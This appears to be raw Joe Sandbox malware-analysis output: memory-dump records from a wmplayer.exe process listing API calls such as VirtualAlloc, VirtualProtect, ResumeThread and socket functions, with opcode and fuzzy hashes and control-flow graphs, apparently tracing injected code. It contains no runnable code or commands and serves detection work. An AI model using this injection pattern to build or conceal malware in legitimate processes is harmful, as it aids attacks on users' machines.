                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: bd75e34d41d0a0c218f00c4b384fa59cf13494ae4b0fc6bee219bc2a66024f0a
                                              • Instruction ID: b5b7de5d584b02812ee3cb82fb95bca9809fd871dc626ec6c68c638940b741a7
                                              • Opcode Fuzzy Hash: bd75e34d41d0a0c218f00c4b384fa59cf13494ae4b0fc6bee219bc2a66024f0a
                                              • Instruction Fuzzy Hash: 47D05B39D587499BD710FB68C88460A7BE1FBD9358F644618E88583354E33CE541C796
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 27a0ab9b8b81d19b55a36d5b88940b5d877d47714e961321c564cf766a84aa8c
                                              • Instruction ID: 72d5a1217ea6a5d1ba425ca17f4850963eaa1fd46165d02f3ace7402083e2f04
                                              • Opcode Fuzzy Hash: 27a0ab9b8b81d19b55a36d5b88940b5d877d47714e961321c564cf766a84aa8c
                                              • Instruction Fuzzy Hash: 83D01238A187498BD710AB68899560A7BE1B7C9354F544658F85983314E23CE581C69A
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 2134b33d09b848e70ba1f23de37cfdd97cd4e92c7083e33fbb9b34bfa8345c36
                                              • Instruction ID: c93df5b3d8cec258d22705d019447b47e8ceda16784baa2171eaca464f87b8c2
                                              • Opcode Fuzzy Hash: 2134b33d09b848e70ba1f23de37cfdd97cd4e92c7083e33fbb9b34bfa8345c36
                                              • Instruction Fuzzy Hash: E8C08C20A1880F2AE91562FA8CD474A2080A78A3C0FC00000B81AC2180F40CEEC483B6
                                              APIs
                                              • NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,00000230766F531B), ref: 00000230767028F8
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 14fbc5d4ea2d13eb613c5f0cfb1986910ad3174e43fd425e2ce4bb45159b65c3
                                              • Instruction ID: 3c9b30717a3757e6ad1c99cd4c5f1dddcaa5a857bcf1527ebe53d7042f2ac896
                                              • Opcode Fuzzy Hash: 14fbc5d4ea2d13eb613c5f0cfb1986910ad3174e43fd425e2ce4bb45159b65c3
                                              • Instruction Fuzzy Hash: 91C04C25629D0E5EE954A2E94DD57596290A759394F840400982AD2180E90DE6D493B6

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: socket$ErrorModeStartupgetsockopt
                                              • String ID:
                                              • API String ID: 2955919026-0
                                              • Opcode ID: 3bad8950bc8ed42d49e75fcab8a12e6def80f6fb96da2e8da31b13afe45452c3
                                              • Instruction ID: 77359e9461c4e1454e1deecbb3445e9e6a9f2df2d0f8647f95c175b9c7c9a3f8
                                              • Opcode Fuzzy Hash: 3bad8950bc8ed42d49e75fcab8a12e6def80f6fb96da2e8da31b13afe45452c3
                                              • Instruction Fuzzy Hash: 25417530618A498FE759EF28D89C6AAB7E5FB98300F504A3DE04BC33A1DF789515CB51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CloseInformationOpenQueryValueVolume
                                              • String ID:
                                              • API String ID: 4069062851-0
                                              • Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                              • Instruction ID: 806b8b519a5f0cf83d001a7ff39748ce37bc9385911f73f7fbecf5647249e2fe
                                              • Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
                                              • Instruction Fuzzy Hash: 9A412B7051DA488BE759EB24C899BDBB3F1FB94305F404A2EE48BC3191EF78D5048B42

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: rE\
                                              • API String ID: 544645111-988334199
                                              • Opcode ID: fd197d1d460a7a7097ebc69198cfe8898b84731961e3c45740b5833891c72836
                                              • Instruction ID: ab4e9cb8e49053c15a87e7ddecd5d185a396d1d056353220ce004fb49acf8da4
                                              • Opcode Fuzzy Hash: fd197d1d460a7a7097ebc69198cfe8898b84731961e3c45740b5833891c72836
                                              • Instruction Fuzzy Hash: 9F11AE3130490C0FEB55F798E8D5BE9B2D6F7D4300F505529940BC3285DE2CDE458791

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: File$ChangeCloseFindMappingNotificationOpenView
                                              • String ID:
                                              • API String ID: 1008110341-0
                                              • Opcode ID: 8bb8605ac1c349b7ed951fd2da0efd1c73228fe5391c7a5f19e2fcd3618d3200
                                              • Instruction ID: 7d34ff7238cc63d58fb47a3e8cb012c368266810743e72f439aa0e17a19560aa
                                              • Opcode Fuzzy Hash: 8bb8605ac1c349b7ed951fd2da0efd1c73228fe5391c7a5f19e2fcd3618d3200
                                              • Instruction Fuzzy Hash: 4531613161490C8FEB55FF64E8DA6EBB3D4FB94300F50452AA44BC2181EE34E649C7A1

                                              Control-flow Graph

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CreateWindow
                                              • String ID: P
                                              • API String ID: 716092398-3110715001
                                              • Opcode ID: 3958d680dd61ed40200acf61cd907bfc270c34c5250da5fbb8d7e78c828db693
                                              • Instruction ID: d0a5e6ab3311fcca8cc67d67b5910f85ea529c1a2a80aef721962242db7da3b1
                                              • Opcode Fuzzy Hash: 3958d680dd61ed40200acf61cd907bfc270c34c5250da5fbb8d7e78c828db693
                                              • Instruction Fuzzy Hash: 97514F70518B488FD7A5EF28E89A79AB7E4FB95311F104A2FE08EC2150DF34A545CB93

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 283 7df4adb83018-7df4adb8304d call 7df4adb81478 286 7df4adb83053-7df4adb83068 call 7df4adb81538 283->286 287 7df4adb832e0-7df4adb83302 call 7df4adb834f0 283->287 286->287 292 7df4adb8306e-7df4adb8309c call 7df4adb81708 call 7df4adb81740 call 7df4adb81818 286->292 292->287 300 7df4adb830a2-7df4adb830ca 292->300 300->287 302 7df4adb830d0-7df4adb830d8 300->302 303 7df4adb8318a-7df4adb8320a call 7df4adb83520 call 7df4adb8368c call 7df4adb83686 call 7df4adb83680 SendMessageA 302->303 304 7df4adb830de-7df4adb83122 call 7df4adb8365c * 2 302->304 329 7df4adb83213-7df4adb83219 303->329 317 7df4adb83185-7df4adb83188 304->317 317->303 320 7df4adb83124-7df4adb83128 317->320 321 7df4adb8312a-7df4adb8312e 320->321 322 7df4adb83130-7df4adb83146 _calloc_dbg 320->322 321->322 324 7df4adb83182-7df4adb83183 321->324 322->324 325 7df4adb83148-7df4adb83163 call 7df4adb83510 322->325 324->317 330 7df4adb83165-7df4adb8316f 325->330 331 7df4adb83171-7df4adb83175 325->331 332 7df4adb8321f-7df4adb83225 329->332 333 7df4adb832dd-7df4adb832de 329->333 330->324 331->324 334 7df4adb83177-7df4adb8317f 331->334 332->333 335 7df4adb8322b-7df4adb8323d 332->335 333->287 334->324 335->333 337 7df4adb83243-7df4adb83256 call 7df4adb83510 335->337 340 7df4adb832bf-7df4adb832d2 337->340 342 7df4adb83258-7df4adb8325b 340->342 343 7df4adb832d4-7df4adb832d5 340->343 344 7df4adb832bd 342->344 345 7df4adb8325d-7df4adb83280 call 7df4adb8365c 342->345 343->333 344->340 349 7df4adb8328a-7df4adb832b7 call 7df4adb8365c 345->349 350 7df4adb83282-7df4adb83288 345->350 349->344 350->344
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3765088712.00007DF4ADB81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB81000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb81000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionMessageProtectSendTableVirtual_calloc_dbg
                                              • String ID:
                                              • API String ID: 963881631-0
                                              • Opcode ID: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
                                              • Instruction ID: d02784a6add5e7e70075899f07dfec22d187fbcaa96c71dd9fa9a24e80dd8f69
                                              • Opcode Fuzzy Hash: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
                                              • Instruction Fuzzy Hash: 8B91713060DA888FEB54EF28D9955AE73F2FB94305B504A3ED08BC32D1DA78E845C781

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 419 230766f22d0-230766f22ff GetSystemInfo 420 230766f230f-230766f2325 419->420 421 230766f2301-230766f230c 419->421 422 230766f232b-230766f232e 420->422 421->420 423 230766f234a-230766f2350 422->423 424 230766f2330-230766f2333 422->424 427 230766f23cb-230766f23ce 423->427 428 230766f2352-230766f2362 423->428 425 230766f2345-230766f2348 424->425 426 230766f2335-230766f2338 424->426 425->422 426->425 430 230766f233a-230766f233f 426->430 429 230766f245a 427->429 431 230766f2391-230766f2397 428->431 435 230766f245c-230766f245f 429->435 436 230766f2467-230766f247e 429->436 430->425 432 230766f24ad-230766f24bf 430->432 433 230766f2399 431->433 434 230766f2364-230766f237b 431->434 437 230766f239b-230766f239e 433->437 434->433 447 230766f237d-230766f2385 434->447 438 230766f2465 435->438 439 230766f23d3-230766f23f1 435->439 440 230766f2480-230766f249a 436->440 437->427 445 230766f23a0-230766f23c0 VirtualAlloc 437->445 438->432 442 230766f2433 439->442 443 230766f23f3-230766f240a 439->443 440->440 441 230766f249c-230766f24a7 440->441 441->432 446 230766f2435-230766f2438 442->446 443->442 452 230766f240c-230766f2414 443->452 445->436 448 230766f23c6-230766f23c9 445->448 446->432 450 230766f243a-230766f2458 446->450 447->437 451 230766f2387-230766f238f 447->451 448->427 448->428 450->429 451->431 451->433 452->446 453 230766f2416-230766f2431 452->453 453->442 453->443
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AllocInfoSystemVirtual
                                              • String ID:
                                              • API String ID: 3440192736-0
                                              • Opcode ID: 9420d4d47bb5eb7f06d7fea4bf54311970c83033f74d5905fb72208c54926d5e
                                              • Instruction ID: d67ed33ac6860ced4e2e1cd2dec5ac9c8c75e681cac6480e68473646e6448fcc
                                              • Opcode Fuzzy Hash: 9420d4d47bb5eb7f06d7fea4bf54311970c83033f74d5905fb72208c54926d5e
                                              • Instruction Fuzzy Hash: A151D671218E0D4FE765EBECE4AC3A9B3D6F798301F904129D44AC3194EE79DD818B92

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFileFindNotificationView
                                              • String ID:
                                              • API String ID: 556135526-0
                                              • Opcode ID: f5e4ace49f8dbf4d208ab68c6c07d1c08f373a7b01313fe5be4b999b6ef0fbb6
                                              • Instruction ID: 5ea2cf0216273c04de96a076bed526394d93e0e3b997eef1cdc3cd15e35dddeb
                                              • Opcode Fuzzy Hash: f5e4ace49f8dbf4d208ab68c6c07d1c08f373a7b01313fe5be4b999b6ef0fbb6
                                              • Instruction Fuzzy Hash: 2A41B43021490C8FEB65FFA8E8D86EAB3E5FB95305F404529A50BC3195DF28FA458B91

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 9af94119fb7637b7a971dd9e5dfe6689dbe62cc4b897151fb24c5dcbfab40a36
                                              • Instruction ID: c658be6f69793c0b4780e3780c266b3c11ba73858080522911907e5cdcae9a48
                                              • Opcode Fuzzy Hash: 9af94119fb7637b7a971dd9e5dfe6689dbe62cc4b897151fb24c5dcbfab40a36
                                              • Instruction Fuzzy Hash: 6C315C30308A894BEB24DFACE8E87D57BC5FB5A314F550295EC8AC72C5DB58D802C796

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3764684590.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                              • Instruction ID: 7e432a9b09e95c664bf1416e4ada4caf807a28c28b642143c561c72b7dafc79b
                                              • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                              • Instruction Fuzzy Hash: 4B2136B160B98557EB189B2CC580E76B3F5FF90388F15113BE84FC7AA5E768F8018265
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                              • Instruction ID: c12b4ef9c783b57f5f2e28f89b7f753e5515b8d38ba25e708630117cb11d7929
                                              • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                              • Instruction Fuzzy Hash: 182127B160B98557EB189B2CC580E76B3F5FF90384F15113BE84FC7AA5E668E8018264

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3765088712.00007DF4ADB81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB81000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb81000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
                                              • Instruction ID: e6878eefa134b790b61c142c9ae1f8aff63c49f48d4ebef41f77a663c68f049c
                                              • Opcode Fuzzy Hash: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
                                              • Instruction Fuzzy Hash: B92105B990B54547EB189B2CD684A7BB3F1FFA0388F14413EE44FC72A4D668F8018281
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                              • Instruction ID: 1fbf8d782b8b25698e2bf36c7bef87e6a991dc9bcefaf589ac587e4df2c8a157
                                              • Opcode Fuzzy Hash: 5a17d2a82900e38e66e0587de357cfea25c88adc918405c2cab64094945da2f0
                                              • Instruction Fuzzy Hash: D2F09670218D0E4FEF98DFAE88D9F6273D0FF58350F501164980AC7289DA29DC41D750
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 59198f789e8770a8feb484424aff911a50a4b1632d60f2ad6db9f6e5577744bf
                                              • Instruction ID: 1b074d3f2aa449e216e9e842e7afac4365b0fb3041a84ea7c8a5824bc57fa213
                                              • Opcode Fuzzy Hash: 59198f789e8770a8feb484424aff911a50a4b1632d60f2ad6db9f6e5577744bf
                                              • Instruction Fuzzy Hash: 55913E31518A4C4BD765EB54D4D96EBF3E1FB94300F40492EE08BC3192EE35EA49CB92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: e26a3d902f64fdb1e6a29b1ddfd8af137ced715061d327bbcfc87f3b72d7e64f
                                              • Instruction ID: 3bbab4b016cb76bb89938c6dc7e7360308c679cec18ef550b4a5215339459379
                                              • Opcode Fuzzy Hash: e26a3d902f64fdb1e6a29b1ddfd8af137ced715061d327bbcfc87f3b72d7e64f
                                              • Instruction Fuzzy Hash: CB71E735208B0C8FD779EB58E8D5AA6B3E1FB94710F500A1DD48BC3192DA38FA45CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FileMappingOpen
                                              • String ID:
                                              • API String ID: 1680863896-0
                                              • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                              • Instruction ID: 09b4ca347a273d23249165f2ffc099f517a109b827aef265b1130e114eb8ddb1
                                              • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                              • Instruction Fuzzy Hash: 4B71537061D7884FD765EB28D4857ABB7F1FB98300F004A3EE58FC3192EA34A5058B92
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ErrorMode
                                              • String ID:
                                              • API String ID: 2340568224-0
                                              • Opcode ID: c27442c9625b69612e30a0c621dafdc38b3cd1b2ea33eefe8ec2cdf5f7c33623
                                              • Instruction ID: 2f7920a0b2f77f0ca6cac80687fac505c3a14687f0f10fb1a8e09963f0075127
                                              • Opcode Fuzzy Hash: c27442c9625b69612e30a0c621dafdc38b3cd1b2ea33eefe8ec2cdf5f7c33623
                                              • Instruction Fuzzy Hash: 7441A93031490D0BEF69E774F8E97EAB2D5E794310F800629A447E31D6DE2DEA058761
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg
                                              • String ID:
                                              • API String ID: 1527718024-0
                                              • Opcode ID: d2cb0783aaccdf533b8783a245833ea662784d452517a49626c29c14fb2d72e4
                                              • Instruction ID: 3e55d195b510abfd5a2beb05a3195494bffe5cf7f4916bd1d417878934debece
                                              • Opcode Fuzzy Hash: d2cb0783aaccdf533b8783a245833ea662784d452517a49626c29c14fb2d72e4
                                              • Instruction Fuzzy Hash: 3141A131218D0E9FDB94EF6CD8DCAA5B7E0FB68311750466AD41AC3664DB74E981CBC0
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InformationVolume
                                              • String ID:
                                              • API String ID: 2039140958-0
                                              • Opcode ID: c6fe4b8a49b1c432d16a5d1b2244a4336856686fe2f0bc0d983b446ba2d85ae3
                                              • Instruction ID: 558629faf030e0b142fc13855f5a28199b12e48ca5762aa98cee74aa804d5ff8
                                              • Opcode Fuzzy Hash: c6fe4b8a49b1c432d16a5d1b2244a4336856686fe2f0bc0d983b446ba2d85ae3
                                              • Instruction Fuzzy Hash: 78414F711186488BE769EF64D4E9BDBF7E1FB94340F404A1DA08BC3191EE79A604CB52
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 2f464fde3477c0bba4832f44d3340180ae7d23497e5ed422822a87f1e6a42210
                                              • Instruction ID: 595d48dc07ff95301962e8648122a0a0345d15dd9ba8eb3e0eb063a298960a0e
                                              • Opcode Fuzzy Hash: 2f464fde3477c0bba4832f44d3340180ae7d23497e5ed422822a87f1e6a42210
                                              • Instruction Fuzzy Hash: 52018471204A0C8FE741FB59D8C59ADB7E9FBD8314F50062AE84AC6150EF24EA55C791
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: e53db298d0d7d8de9701e8a24c72cb59212fc55ca396913229799ff2ccd7724d
                                              • Instruction ID: 80b8f4006e18079666537d4e47b848d41e0f18f0a61eedc5868e762c057df7a5
                                              • Opcode Fuzzy Hash: e53db298d0d7d8de9701e8a24c72cb59212fc55ca396913229799ff2ccd7724d
                                              • Instruction Fuzzy Hash: FB112130200A1D9FEFA59FA988E83E676D0EB58355F14017AEC0ACA195CB74ED45C7B1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID:
                                              • API String ID: 947044025-0
                                              • Opcode ID: a3e65a005f3911c52a3a19618f507bf36bcbd5794d57615cb3bbd7cad2f75c67
                                              • Instruction ID: 3abbfdd9b83e6e793d1308642005adb725df1bda1b7eff346a22321527631a75
                                              • Opcode Fuzzy Hash: a3e65a005f3911c52a3a19618f507bf36bcbd5794d57615cb3bbd7cad2f75c67
                                              • Instruction Fuzzy Hash: 0B01263171490D8FEB64ABAEECA866573DAFB8A316B444065D80AC3144DA3EAC41CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3765088712.00007DF4ADB81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB81000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb81000_wmplayer.jbxd
                                              Similarity
                                              • API ID: EventHook
                                              • String ID:
                                              • API String ID: 3661607649-0
                                              • Opcode ID: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
                                              • Instruction ID: 3d5b21c0212b03d9331fc1685e1f8c088c7145b65b7f7802ba03a4b847fa951f
                                              • Opcode Fuzzy Hash: e6b188324f96a1e03f166e4287a2793acb406422b2b30f8b11d607c185f61fee
                                              • Instruction Fuzzy Hash: 7F116D3081A9858FEB54AB64D9697AF72B0FF10318F600A3DD48BC22E1EB3DA4449741
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 4d57d7d5982399080f90361c2699a999889f8feb933735bc5bb6e787f07df0d3
                                              • Instruction ID: f3291b0cab7b5f9e1777a731ff65904de3a15d9b101934159820edddb6b8eb26
                                              • Opcode Fuzzy Hash: 4d57d7d5982399080f90361c2699a999889f8feb933735bc5bb6e787f07df0d3
                                              • Instruction Fuzzy Hash: 0B01A460314A4C4FFB55EBB8A8B93A9B6D6EB94301F50056AA00BC32D1EA2CDE058751
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CreateHeap
                                              • String ID:
                                              • API String ID: 10892065-0
                                              • Opcode ID: eab2b32177be9564e25d5777707ea1ca30621b5695f0306aefe172fe800bc35c
                                              • Instruction ID: 8665bb108a4a3835020c3665c925f7b19731d9e15ebce6705f70d5b608495d1c
                                              • Opcode Fuzzy Hash: eab2b32177be9564e25d5777707ea1ca30621b5695f0306aefe172fe800bc35c
                                              • Instruction Fuzzy Hash: B9F0E521708A0D4FF730AEF67CE93AA724BE384317FA40D3AD807C6185D83D99828760
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AddressCallerProc
                                              • String ID:
                                              • API String ID: 2663294120-0
                                              • Opcode ID: c691d5039295ecc8b7e044fb40fc3c69618cf93c91779b6bda279d67736a12d8
                                              • Instruction ID: abe131e14be8b3ed5af88f15dc85e854ac341766a9624efb58c7c9b121b6fc58
                                              • Opcode Fuzzy Hash: c691d5039295ecc8b7e044fb40fc3c69618cf93c91779b6bda279d67736a12d8
                                              • Instruction Fuzzy Hash: 2FE0C221B04C1E0BAB7862EE64DCAB651C6C7DC172754027BE42DC3299EC14CC410390
